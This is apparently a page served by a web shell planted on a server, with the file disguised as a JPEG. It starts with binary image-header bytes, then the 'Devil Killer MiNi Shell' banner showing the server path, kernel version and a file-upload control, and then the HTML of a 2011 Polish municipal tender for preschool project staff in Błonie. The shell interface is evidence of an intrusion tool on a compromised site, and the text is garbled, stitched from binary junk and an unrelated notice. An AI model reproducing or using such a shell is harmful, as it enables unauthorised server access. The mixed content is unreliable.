JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111103/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111103/286847-N-2011.html

<p class="kh_header"><b>Błonie: Przedszkola jak z Bajki - upowszechnienie edukacji przedszkolnej w gminie Błonie</b><br>
<b>Numer ogłoszenia: 286847 - 2011; data zamieszczenia: 03.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Błonie , Rynek 6, 05-870 Błonie, woj. mazowieckie, tel. 022 7253004, 7253006, faks 022 7253067.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.blonie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedszkola jak z Bajki - upowszechnienie edukacji przedszkolnej w gminie Błonie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 - Przedmiotem zamówienia jest zatrudnienie Koordynatora projektu dla potrzeb realizacji projektu Przedszkola jak z Bajki - upowszechnianie edukacji przedszkolnej w gminie Błonie.
Część 2 - Zatrudnienie osób na stanowiskach nauczycieli i specjalistów prowadzących zajęcia
Część 3 - Zakup i dostawa pomocy dydaktycznych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 80.11.00.00-8, 80.34.00.00-9, 80.57.00.00-0, 39.16.10.00-8, 39.19.00.00-7, 37.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium do żadnej z części przedmiotu zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1
a). osoba zatrudniona na stanowisku Koordynatora projektu winna wykazać się doświadczeniem    
w realizacji co najmniej 1 projektu współfinansowanego z Europejskiego Funduszu Społecznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a). wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w ilości niezbędnej 
        gwarantującej należyte wykonanie zadania, wraz z informacjami na temat ich kwalifikacji 
        zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a 
        także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do
        dysponowania tymi osobami. W tym: 
 Część 1
  - min 1 osoba posiadająca co najmniej wykształcenie wyższe oraz minimum trzy letnie  
doświadczenie w zakresie zarządzania placówką przedszkolną.   
 Część 2
a)W odniesieniu do nauczyciela prowadzącego warsztaty metodą ruchu rozwijającego:
- kwalifikacje do zajmowania stanowiska nauczyciela wychowania przedszkolnego, określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400), - ukończony kurs doskonalący z Metody Ruchu Rozwijającego wg Weroniki Sherborne - co najmniej trzyletnie doświadczenie w pracy na stanowisku nauczyciela-  co najmniej roczne doświadczenie prowadzenia warsztatów MRR z rodzicami i dziećmi - co najmniej stopień awansu zawodowego  - nauczyciel kontraktowy.
      b)  W odniesieniu do nauczyciela prowadzącego warsztaty  terapii więzi rodzinnych -  kwalifikacje 
do zajmowania stanowiska nauczyciela wychowania przedszkolnego z terapią pedagogiczną lub pedagoga specjalnego, określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400), - co najmniej trzyletnie doświadczenie w pracy na stanowisku nauczyciela w przedszkolu -  co najmniej stopień awansu zawodowego  - nauczyciel kontraktowy.
c) W odniesieniu do psychologa prowadzącego konsultacje dla rodziców  -  kwalifikacje do 
zajmowania stanowiska nauczyciela-psychologa w szkołach i placówkach - kwalifikacje do zajmowania stanowiska nauczyciela wychowania przedszkolnego, określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400), - ukończony kurs doskonalący udzielania pomocy rodzinom dotkniętych kryzysem- ukończony kurs warsztatów dla rodziców metodą Adele Faber i Eleine Mazlish - co najmniej 2-letnie doświadczenie w prowadzeniu grup wsparcia dla rodziców - co najmniej 5-letnie doświadczenie w pracy w przedszkolu - co najmniej nauczyciel mianowany. 
d) W odniesieniu do nauczycieli prowadzących zajęcia wychowania przedszkolnego w 
dodatkowych grupach - kwalifikacje do zajmowania stanowiska nauczyciela wychowania przedszkolnego, określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 
12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400), - co najmniej roczne doświadczenie w pracy w przedszkolu - co najmniej nauczyciel kontraktowy. 






e)  W odniesieniu do specjalisty neurologopedy- kwalifikacje do zajmowania stanowiska 
nauczyciela-logopedy określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400), - ukończony kurs kwalifikacyjny z neurologopedii lub neurologii- co najmniej 2-letnie doświadczenie w pracy z dziećmi z afazją, porażeniem mózgowym, mutyzmem selektywnym. 
f)  W odniesieniu do specjalisty dogoterapii - kwalifikacje do zajmowania stanowiska 
pedagoga specjalnego określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400) - ukończony kurs kwalifikacyjny z dogoterapii - posiadanie psa przeszkolonego w dogoterpii - co najmniej 2 -letnie doświadczenie w pracy z dziećmi niepełnosprawnymi w zakresie dogoterpii - co najmniej nauczyciel kontraktowy.
g) W odniesieniu do fizjoterapeuty - ukończone wyższe studia na kierunku fizjoterapii-co 
najmniej trzyletnie doświadczenie w pracy z dziećmi niepełnosprawnymi, w tym z porażeniem mózgowym.
h) W odniesieniu do psychologa - kwalifikacje do zajmowania stanowiska nauczyciela-
psychologa w szkołach i placówkach określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400),   - co najmniej nauczyciel kontraktowy -co najmniej roczne doświadczenie pracy z dziećmi w wieku przedszkolnym.
i) W odniesieniu do psychologa klinicznego - ukończone studia magisterskie na kierunku 
psychologii, specjalizacja psychologia kliniczna. - co najmniej roczne doświadczenie w pracy z małymi dziećmi.
j)  W odniesieniu do terapeuty integracji sensorycznej - kwalifikacje do zajmowania 
stanowiska pedagoga specjalnego w szkołach i placówkach określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400),  - ukończony kurs kwalifikacyjny I i II stopnia z terapii integracji sensorycznej - co najmniej nauczyciel mianowany - co najmniej trzyletnie doświadczenie w pracy z dziećmi w wieku przedszkolnym.
k) W odniesieniu do pedagoga terapii polisensorycznej -  kwalifikacje do zajmowania 
stanowiska pedagoga specjalnego w szkołach i placówkach określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400),  ukończony kurs terapii polisensorycznej w sali doświadczania świata - co najmniej nauczyciel mianowany co najmniej dwuletnie doświadczenie w pracy z dziećmi w wieku przedszkolnym.

l) W odniesieniu do terapii specjalistycznej - -przygotowanie pedagogiczne -kwalifikacje 
terapeuty widzenia lub surdopedagoga, co najmniej dwuletnie doświadczenie w pracy z dziećmi niepełnosprawnym w wieku przedszkolnym.
ł) W odniesieniu do logopedy i logarytmika  kwalifikacje do zajmowania stanowiska 
    nauczyciela/logopedy/logarytmika w szkołach i placówkach określone w rozporządzeniu 
Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400),  - co najmniej dwuletnie doświadczenie w pracy dziećmi w wieku przedszkolnym - umiejętność posługiwania się programami komputerowymi do badania mowy i słuchu dzieci. 
        m) W odniesieniu do specjalisty prowadzącego gimnastykę korekcyjną -  ukończone 
studia w Akademii Wychowania Fizycznego lub studia podyplomowe lub kurs kwalifikacyjny w zakresie gimnastyki korekcyjnej - co najmniej dwuletnie doświadczenie w pracy z dziećmi w wieku przedszkolnym.
        n)  W odniesieniu do osoby prowadzącej rytmikę - ukończone wyższe studia o kierunku  
muzycznym - co najmniej dwuletnie doświadczenie w pracy z dziećmi w wieku przedszkolnym.
o) W odniesieniu do instruktora tańca - ukończone wyższe studia z choreografii tańca, lub 
studia podyplomowe -bądź kurs kwalifikacyjny - co najmniej dwuletnie doświadczenie w pracy z dziećmi przedszkolnymi,
p) W odniesieniu do nauczyciela plastyki -   kwalifikacje do zajmowania stanowiska 
nauczyciela wychowania przedszkolnego, określone w rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. 2009 r. Nr 50, poz.400), - ukończony kurs z technik plastycznych- co najmniej trzyletnie doświadczenie w pracy na stanowisku nauczyciela.
r) W odniesieniu do lektora języka angielskiego - przygotowanie pedagogiczne, ukończone 
studia wyższe lub podyplomowe językowe - co najmniej roczne doświadczenie w pracy, w przedszkolu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się inne dokumenty wymagane przez Zamawiającego dotyczy wszystkich 3 części : :
1.1. druk oferty wypełniony i podpisany przez osoby uprawnione,
1.2. oświadczenie o spełnieniu warunków określonych przepisami art. 22 ust.1 ustawy Pzp,
1.3. oświadczenie o spełnieniu warunków określonych przepisami art. 44 ustawy Pzp
1.4. podpisany wzór umowy.
1.5. oświadczenie do części nr 2 o posiadaniu niezbędnego wykształcenia i uprawnień do 
prowadzenia zajęć (przy podpisaniu umowy Zamawiający może żądać wykazanych uprawnień).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość następujących zmian postanowień zawartej umowy w 
stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
- zmiana terminu wykonania zamówienia w przypadku zmiany umowy o dofinansowanie 
projektu,
2. Wszystkie zmiany treści umowy wymagają zachowania formy pisemnej pod rygorem 
nieważności i wymagają zgody obu Stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.blonie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Błoniu, ul. Rynek 6, 05-870 Błonie, pok. nr 3 Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 11:00, miejsce: Urząd Miejski w Błoniu, ul. Rynek 6, 05-870 Błonie, pok. nr 1 Biuro Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki
Priorytet IX. Rozwój wykształcenia i kompetencji w regionach
Działanie 9.1. Wyrównanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty
Poddziałanie 9.1.1. Zmniejszenie nierówności w stopniu upowszechnienia edukacji przedszkolnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest zatrudnienie Koordynatora projektu dla potrzeb realizacji projektu Przedszkola jak z Bajki - upowszechnianie edukacji przedszkolnej w gminie Błonie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach świadczonej usługi Koordynator projektu będzie zobowiązany do wykonywania następujących czynności:
Przygotowanie szczegółowej strategii realizacji projektu
Przygotowanie planu operacyjnego wdrożenia i realizacji projektu (procedury, standardy komunikacji, matryca odpowiedzialności itp.)
Nadzór i koordynacja pracy członków zespołu projektowego, w tym organizacja min. raz na miesiąc spotkań z Przedszkolnymi Opiekunami Projektu oraz personelem zarządzającym, podczas których będą omawiane działania realizowane w ramach projektu - forma Komitetu Sterującego
Podejmowanie kluczowych decyzji w projekcie (w tym konsultacji z osobami odpowiedzialnymi za przedmiotowy obszar) 
Nadzór nad zgodnością projektu z wytycznymi dotyczącymi realizacji projektów finansowanych z EFS, w tym zachowaniem równości płci
Podejmowanie decyzji o wyborze dostawców usług (m.in. usługi w zakresie promocji), na podstawie odpowiedzi potencjalnych dostawców na zapytania ofertowe przygotowane przez Koordynatora projektu wraz z Asystentem
Współpraca z Przedszkolnymi Opiekunami Projektu oraz kadrą dydaktyczną realizującą działania projektowe, której celem jest utrzymanie najwyższego poziomu merytorycznego realizowanych działań
Zatwierdzanie wydatków w projekcie, kontrola budżetu (zapewnienie racjonalności i efektywności wydatków), kontrola zgodności wydatków w projekcie z Wytycznymi w zakresie kwalifikowania wydatków w ramach POKL
Zarządzanie ryzykiem w projekcie (identyfikacja i przeciwdziałanie ryzykom, rozwiązywanie problemów)
Monitoring rezultatów projektu (analiza raportów przygotowywanych przez Asystenta Koordynatora Projektu - raporty osiągania założonych wskaźników) oraz  w razie potrzeby podejmowanie działań korygujących
Bieżący kontakt z Instytucją Pośredniczącą 
Zamówienie w odniesieniu do Koordynatora projektu będzie realizowane w terminie: od dnia podpisania umowy do 31.07.2012 r. Przewidywana liczba godzin pracy miesięcznie: 120 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zatrudnienie osób na stanowiskach nauczycieli i specjalistów prowadzących zajęcia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - Wsparcie rodziców w pracy z dzieckiem.
Wykonawca zobowiązany jest do zorganizowania i przeprowadzenia zajęć:
- warsztaty metodą ruchu rozwijającego - zadanie realizowane będzie przez nauczyciela prowadzącego od dnia podpisania umowy do dnia 30.07.2012 r., w wymiarze 234 godzin zegarowych dla sześciu grup w przedszkolu nr 3. Średnio jedna godzina dydaktyczna w tygodniu( jednostka dydaktyczna trwa 60 minut).
- terapia więzi rodzinnych - zadanie realizowane będzie przez nauczyciela prowadzącego od dnia podpisania umowy do dnia 30.07.2012 r., w wymiarze 1170 godzin zegarowych dla 30 rodzin (opiekun + dziecko) w przedszkolu nr 3. Średnio dla jednej rodziny 1 godzina dydaktyczna tygodniowo (jednostka dydaktyczna trwa 60 minut).
konsultacje psychologiczne - zadanie realizowane będzie przez psychologa prowadzącego w formie indywidualnych konsultacji psychologicznych z rodzicami w okresie od 03 stycznia 2012 r. do 30.07.2012 r., w wymiarze 150 godzin zegarowych dla 30 rodzin w przedszkolu nr 3. Średnio 5 godzin dydaktycznych (każda godzina zegarowa trwa 60 minut) dla jednej rodziny w ciągu trwania całego projektu.



Zadanie nr 2  - Upowszechnianie edukacji przedszkolnej, dodatkowa rekrutacja i utworzenie 
nowych grup.
- zajęcia dodatkowe -  zadanie realizowane będzie przez nauczyciela prowadzącego od dnia podpisania umowy do dnia 30.07.2012 r., w wymiarze 975 godzin zegarowych w jednej dodatkowej grupie przedszkolnej w przedszkolu nr 5. Dla jednej grupy 25 godzin dydaktycznych w tygodniu (jednostka dydaktyczna trwa 60 minut) - 5 godzin dydaktycznych dziennie przez pięć dni w tygodniu.
- zajęcia dodatkowe -  zadanie realizowane będzie przez nauczyciela prowadzącego od dnia podpisania umowy do dnia 30.07.2012 r., w wymiarze 975 godzin zegarowych w jednej dodatkowej grupie przedszkolnej w przedszkolu nr 6 -  5 godzin dydaktycznych dziennie przez pięć dni w tygodniu.
- zajęcia dodatkowe -  zadanie realizowane będzie przez nauczyciela prowadzącego od dnia podpisania umowy do dnia 30.07.2012 r., w wymiarze 546 godzin zegarowych w dwóch dodatkowej grupach przedszkolnych w przedszkolu nr 3 -  7 godzin dydaktycznych w tygodniu.

Zadanie nr 3  - Wsparcie dzieci o specjalnych potrzebach, w tym niepełnosprawnych.
- zatrudnienie specjalisty neurologopedy - zadanie realizowane będzie przez neurologopedę zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 585 godzin zegarowych dla 15 dzieci w przedszkolu nr 3. Dwie jednostki dydaktyczne w tygodniu dla jednego dziecka (jednostka dydaktyczna trwa 30 minut).
-  zatrudnienie specjalisty dogoterapeuty - zadanie realizowane będzie przez  dogoterapeutę zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 312 godzin zegarowych  dla 16 dzieci w przedszkolu nr 3. Jedna jednostka dydaktyczna w tygodniu dla jednego dziecka ( jednostka dydaktyczna trwa 30 minut).
- zatrudnienie specjalisty fizjoterapeuty  -  zadanie realizowane będzie przez fizjoterapeutę zatrudnionego od dnia podpisania umowy do dnia 30.07.2012 r, w wymiarze 390 godzin zegarowych  dla 10 dzieci w przedszkolu nr 3. Jedna godzina dydaktyczna dla jednego dziecka w tygodniu (godzina dydaktyczna trwa 60 minut).
